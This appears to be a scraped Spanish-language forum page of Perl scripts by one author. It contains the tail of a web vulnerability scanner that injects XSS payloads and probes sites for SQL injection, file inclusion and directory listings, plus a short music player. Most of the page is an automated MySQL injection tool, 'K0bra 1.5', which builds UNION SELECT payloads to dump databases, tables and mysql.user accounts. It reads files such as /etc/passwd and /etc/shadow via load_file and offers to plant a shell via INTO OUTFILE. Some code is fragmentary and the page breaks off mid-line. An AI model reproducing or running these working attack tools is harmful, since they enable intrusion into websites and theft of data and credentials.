HTML::Form->parse(toma($page),"/"); my @botones_names; my @botones_values; my @orden; my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>'); my @get_founds; my @post_founds; my @ordenuno; my @ordendos; my $contador_forms = 0; my $valor = "doddyhackman"; for my $test(@testar) { $contador_forms++; if ($test->method eq "POST") { my @inputs = $test->inputs; for my $in(@inputs) { if ($in->type eq "submit") { if ($in->name eq "") { push(@botones_names,"submit"); } push(@botones_names,$in->name); push(@botones_values,$in->value); } else { push(@ordenuno,$in->name,$pa[0]); push(@ordendos,$in->name,$pa[1]); }} for my $n(0..int(@botones_names)-1) { my @preuno = @ordenuno; my @predos = @ordendos; push(@preuno,$botones_names[$n],$botones_values[$n]); push(@predos,$botones_names[$n],$botones_values[$n]); my $codeuno = $nave->post($page,\@preuno)->content; my $codedos = $nave->post($page,\@predos)->content; if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or $codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) { if ($test->attr(name) eq "" or $test->attr(name) eq " ") { push(@post_founds,$contador_forms); } else { push(@post_founds,$test->attr(name )); }}} } else { #Fin de metodo POST my @inputs = $test->inputs; for my $in(@inputs) { if ($in->type eq "submit") { if ($in->name eq "") { push(@botones_names,"submit"); } push(@botones_names,$in->name); push(@botones_values,$in->value); } else { $orden.=''.$in->name.'='.$valor.'&'; }} for my $n(0..int(@botones_names)-1) { my $partedos = "&".$botones_names[$n]."=".$botones_values[$n]; my $final = $orden.$partedos; for my $strin(@pa) { $final=~s/doddyhackman /$strin/; $code = toma($page."?".$final); my $strin = "\Q$strin\E"; if ($code=~/$strin/) { push(@get_founds,$page."?".$final); }}}}} my @get_founds = repes(@get_founds); if (int(@get_founds) ne 0) { for(@get_founds) { savefile("xss-logs.txt","[+] XSS Found : $_"); print "[+] XSS Found : $_\n\a"; }} my @post_founds = repes(@post_founds); if (int(@post_founds) ne 0) { for my $t(@post_founds) { if ($t =~/^\d+$/) { savefile("xss-logs.txt","[+] XSS : Form $t in $page"); print "[+] XSS : Form $t in $page\n\a"; }}}} sub simple { my $code = toma($_[0]); my @links = get_links($code); for my $com (@links) { my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); if ( $path =~ /\/(.*)$/ ) { my $path1 = $1; $_[0] =~ s/$path1//ig; my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); if ( $path =~ /(.*)\// ) { my $parche = $1; unless($repetidos=~/$parche/){ $repetidos.=" ".$parche; my $code=toma("http://".$auth.$parche); if ($code =~ /Index of (.*)</ig ) { my $dir_found = $1; print "[+] Directory Found : "."http://".$auth.$parche."\n"; savefile("dir-logs.txt","[+] Directory Found : "."http://".$auth.$parche); }}}}}} sub scansql { my $copia = $page; $co = toma($page."'"); if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) { savefile("sql-logs.txt","[+] SQL : $page"); print "[+] SQLI : $page\a\n"; } else { if ($page=~/(.*)\?(.*)/) { my $page = $1; my @testar = HTML::Form->parse(toma($page),"/"); my @botones_names; my @botones_values; my @orden; my @get_founds; my @post_founds; my @ordenuno; my @ordendos; my $contador_forms = 0; my $valor = "doddyhackman"; for my $test(@testar) { $contador_forms++; if ($test->method eq "POST") { my @inputs = $test->inputs; for my $in(@inputs) { if ($in->type eq "submit") { if ($in->name eq "") { push(@botones_names,"submit"); } push(@botones_names,$in->name); push(@botones_values,$in->value); } else { push(@ordenuno,$in->name,"'"); }} for my $n(0..int(@botones_names)-1) { my @preuno = @ordenuno; push(@preuno,$botones_names[$n],$botones_values[$n]); my $code = $nave->post($page,\@preuno)->content; if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) { if ($test->attr(name) eq "" or $test->attr(name) eq " ") { push(@post_founds,$contador_forms); } else { push(@post_founds,$test->attr(name )); }}}} my @post_founds = repes(@post_founds); if (int(@post_founds) ne 0) { for my $t(@post_founds) { if ($t =~/^\d+$/) { savefile("sql-logs.txt","[+] SQLI : Form $t in $page"); print "[+] SQLI : Form $t in $page\n\a"; }}}}}}} sub access { $code1 = toma($page."'"); if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) { print "[+] Jet DB : $page\a\n"; savefile("jetdb-logs.txt",$page); } } sub mssql { $code1 = toma($page."'"); if ($code1=~/ODBC SQL Server Driver/ig) { print "[+] MSSQL : $page\a\n"; savefile("mssql-logs.txt",$page); } } sub oracle { $code1 = toma($page."'"); if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) { print "[+] Oracle : $page\a\n"; savefile("oracle-logs.txt",$page); } } sub rfi { $code1 = toma($page."http:/www.supertangas.com/"); if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD print "[+] RFI : $page\a\n"; savefile("rfi-logs.txt",$page); }} sub lfi { $code1 = toma($page."'"); if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) { print "[+] LFI : $page\a\n"; savefile("lfi-logs.txt",$page); }} sub fsd { my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $me = $1; $code1 = toma($page.$me); if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) { print "[+] Full Source Discloure : $page\a\n"; savefile("fpd-logs.txt",$page); }}} sub repes { my @limpio; foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } } sub savewords { @words = <FILE>; for(@words) { } } sub men { print "\n\n[+] Scan Type : \n\n"; print "[S] : SQL GET/POST\n";# print "[Q] : SQL GET + Admin\n"; print "[Y] : Directory listing\n";# print "[J] : Jet Database\n"; print "[F] : Full Source Discloure\n"; print "[HT] : HTTP Information\n"; chomp(my $option = <STDIN>); } sub cortar { my @nuevo; for(@_) { if ($_ =~/=/) { push(@nuevo,@tengo[0]."="); } else { }} } sub get_links { $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); sub agarrar { my ($a,%b) = @_; } } sub installer { unless (-d "logs/") { } } # ¿ The End ?
|
|
|
|
|
437
|
Programación / Scripting / [Perl] Musikeiro 0.1
|
en: 3 Diciembre 2011, 16:32 pm
|
Un reproductor de musica que hice hace dos años en el verano. #!usr/bin/perl #Musikeiro 0.1 #Simple music player #Written by Doddy H in the summer of 2009 #ppm install http://www.bribes.org/perl/ppm/Win32-Console-ANSI.ppd #ppm install http://www.bribes.org/perl/ppm/Win32-MediaPlayer.ppd use Win32::Console::ANSI; use Win32::MediaPlayer; print "\n\e[;32m Bienvenido a Musikeiro\e[0m\n\n\n"; print "\e[33;45;1m Inserta la URL a reproducir: \e[0m"; chomp(my $play = <stdin>); print "\n\e[42m Playing $play \e[0m\n"; print "\n\e[31mPresiona Control + c para detener cancion\e[0m\n\n"; $nave = new Win32::MediaPlayer; $nave->load($play); $nave->play; while(1) { } # The End ?
|
|
|
|
|
438
|
Programación / Scripting / [Perl] K0bra 1.5
|
en: 1 Diciembre 2011, 22:14 pm
|
La nueva version de mi scanner SQLi Las funciones son las siguientes - Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostras tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
#!usr/bin/perl #k0bra 1.5 #Console version #Automatic SQL Scanner for MYSQL #(c)0ded By Doddy H my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'); use LWP::UserAgent; use URI ::Split qw(uri_split ); installer(); my $nave = LWP::UserAgent->new(); $nave->timeout(5); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); &head; unless(@ARGV == 2) { &menu; } else { &scan($ARGV[0],$ARVG[1]); } &finish; sub menu { print "\n[Bypass : -- /* %20] : "; chomp(my $bypass = <STDIN>); &scan($page,$bypass); } sub scan { my $page = $_[0]; print "[Status] : Scanning.....\n"; ($pass1,$bypass2) = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { motor($page,$_[1]); } else { print "\n[-] Not vulnerable\n\n"; print "[+] Scan anyway y/n : "; if ($op eq "y") { motor($page,$_[1]); } else { head(); menu(); } } } sub motor { my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save); } else { print "[Status] : Length columns not found\n\n"; <STDIN>; &head; &menu; } } sub head { @ @@ @ @@ @ @ @@ @ @@ @ @ @ @ @ @ @@@ @ @ @ @ @@ @ @@@ @ @ @@ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @@@ @@@@@ ); } print "\n[+] Looking for the number of columns\n\n"; my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN (\d+)RATSXPDOWN }g ; $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); $total=~s/$number[0]/hackman /; savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); } } } sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if ($page=~/(.*)hackman(.*)/ig) { print "[+] Searching information..\n\n"; my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); print "[mysql.user] : ON\n"; } else { print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON"); } else { print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { print "[load_file] : ON\n"; savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"); } else { print "\n[-] Not found any data\n"; } } } sub menu_options { head(); print "[Target confirmed] : $_[0]\n"; print "[Bypass] : $_[1]\n\n"; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; print "[save] : /logs/webs/$save\n\n"; print "\n--== information_schema.tables ==--\n\n"; print "[1] : Show tables\n"; print "[2] : Show columns\n"; print "[3] : Show DBS\n"; print "[4] : Show tables with other DB\n"; print "[5] : Show columns with other DB\n"; print "\n\n--== mysql.user ==--\n\n"; print "[6] : Show users\n"; print "\n--== Others ==--\n\n"; print "[7] : Fuzzing files with load_file\n"; print "[8] : Read a file with load_file\n"; print "[10] : Informacion of the server\n"; print "[11] : Create a shell with into outfile\n"; print "[12] : Show Log\n"; print "[13] : Change Target\n"; chomp(my $opcion = <STDIN>); if ($opcion eq "1") { schematables($_[0],$_[1],$save); &reload; } elsif ($opcion eq "2") { chomp(my $tabla = <STDIN>); schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($opcion eq "3") { &schemadb($_[0],$_[1],$save); &reload; } elsif ($opcion eq "4") { print "\n\n[DAtabase] : "; chomp(my $data =<STDIN>); &schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($opcion eq "5"){ chomp(my $table =<STDIN>); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($opcion eq "6") { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($opcion eq "7") { &load($_[0],$_[1],$save); &reload; } elsif ($opcion eq "8") { ######################################## &loadfile($_[0],$_[1],$save); &reload; } elsif ($opcion eq "9") { print "\n\n[Table to dump] : "; chomp(my $tabla = <STDIN>); chomp(my $col1 = <STDIN>); chomp(my $col2 = <STDIN>); &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($opcion eq "10") { &details($_[0],$_[1],$save); &reload; } elsif ($opcion eq "11") { print "\n\n[Full Path Discloure] : "; chomp(my $path = <STDIN>); &into($_[0],$_[1],$path,$save); &reload; } elsif ($opcion eq "12") { $t = "logs/webs/$save.txt"; &reload; } elsif ($opcion eq "13") { &head; &menu; } elsif ($opcion eq "14") { &finish; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; } } sub reload { print "\n\n[+] Finish\n\n"; <STDIN>; &head; &menu_options; } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass); $page=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n"); $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),schema_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { print "[-] information_schema = ERROR\n"; } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($_[3].".txt","[Table $real Found : $table ]"); print "[Table $real Found : $table ]\n"; $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = 